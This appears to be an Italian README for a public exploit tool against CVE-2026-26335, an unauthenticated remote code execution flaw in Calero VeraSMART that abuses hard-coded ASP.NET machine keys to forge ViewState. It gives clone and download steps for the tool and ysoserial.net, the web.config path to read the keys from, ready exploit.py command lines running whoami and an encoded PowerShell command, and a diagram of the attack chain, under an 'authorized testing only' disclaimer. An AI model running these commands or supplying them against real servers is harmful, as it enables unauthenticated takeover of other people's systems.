
# Exploit automatizzato per CVE-2026-26335, una RCE critica non autenticata in Calero VeraSMART tramite ViewState ASP.NET contraffatto utilizzando chiavi macchina statiche. Include scoperta degli endpoint, generazione del payload ed esecuzione dei comandi.
Mohammed Idrees Banyamer Ricercatore di Sicurezza
CVE‑2026‑26335 è una vulnerabilità critica di esecuzione remota di codice non autenticata in Calero VeraSMART (pre‑2022 R1).
L'applicazione utilizza chiavi macchina ASP.NET statiche hard‑coded condivise tra le installazioni.
Un attaccante in possesso di queste chiavi può forgiare un ASP.NET ViewState dannoso e innescare deserializzazione lato server → RCE.
Questo exploit automatizza:
__VIEWSTATEGENERATORCWE‑321 — Chiavi crittografiche hard‑coded
Le distribuzioni VeraSMART riutilizzano la stessa machineKey ASP.NET:
<machineKey validationKey="STATIC_KEY"
decryptionKey="STATIC_KEY"
validation="SHA1"
decryption="AES" />
Qualsiasi attaccante con le chiavi di una singola installazione può attaccare tutte le altre.
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe
Le chiavi non sono pubbliche. Ottenerle dal target:
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config
Oppure tramite la lettura file complementare:
CVE‑2026‑26333
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v
9.8 — Critico AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Corretto in VeraSMART 2022 R1:
Soluzioni alternative:
Solo per scopi educativi e test autorizzati. Utilizzare esclusivamente su sistemi di propria proprietà o per i quali si dispone dell'autorizzazione a testare.
Mohammed Idrees Banyamer Ricercatore di Sicurezza
Il seguente diagramma illustra la catena di sfruttamento di CVE‑2026‑26335 in Calero VeraSMART, dove le chiavi macchina ASP.NET statiche consentono di forgiare un ViewState dannoso che porta all'esecuzione remota di codice.
flowchart LR
A[Attacker] --> B[Obtain VeraSMART machineKey]
B --> C[Discover ViewState endpoint]
C --> D[Extract __VIEWSTATEGENERATOR]
D --> E[Generate malicious ViewState via ysoserial]
E --> F[Sign payload with machineKey]
F --> G[Send forged POST request]
G --> H[ASP.NET ViewState deserialization]
H --> I[TypeConfuseDelegate gadget]
I --> J[Remote Code Execution on IIS]